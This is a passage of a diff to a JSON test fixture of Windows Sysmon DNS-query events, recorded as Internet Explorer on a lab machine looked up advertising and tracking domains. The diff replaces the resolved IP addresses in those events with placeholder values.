Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5108,7 +5108,7 @@ "ProcessId": "2736", "QueryName": "dm.hybrid.ai", "QueryStatus": "0", - "QueryResults": "::ffff:37.18.16.16;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", 
@@ -5139,7 +5139,7 @@ "ProcessId": "2736", "QueryName": "static.adsafeprotected.com", "QueryStatus": "0", - "QueryResults": "type: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -5166,7 +5166,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5178,7 +5178,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5190,7 +5190,7 @@ "ProcessId": "2736", "QueryName": "trc.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;", + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -5220,7 +5220,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:107.178.254.65;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5242,7 +5242,7 @@ "ProcessId": "2736", "QueryName": "pippio.com", "QueryStatus": "0", - "QueryResults": "::ffff:107.178.254.65;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "opcode": "Info", 
@@ -5262,7 +5262,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5279,7 +5279,7 @@ "ProcessId": "2736", "QueryName": "pixel-sync.sitescout.com", "QueryStatus": "0", - "QueryResults": "type: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;" + "QueryResults": "type: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;" }, "user": { "identifier": "S-1-5-18" @@ -5312,7 +5312,7 @@ "ProcessId": "2736", "QueryName": "prod.y-medialink.com", "QueryStatus": "0", - "QueryResults": "::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", 
@@ -5334,7 +5334,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5352,7 +5352,7 @@ "time_created": "2019-07-18T03:34:04.693Z", "level": "information", "event_data": { - "QueryResults": "type: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;", + "QueryResults": "type: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.507", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -5376,7 +5376,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5388,7 +5388,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 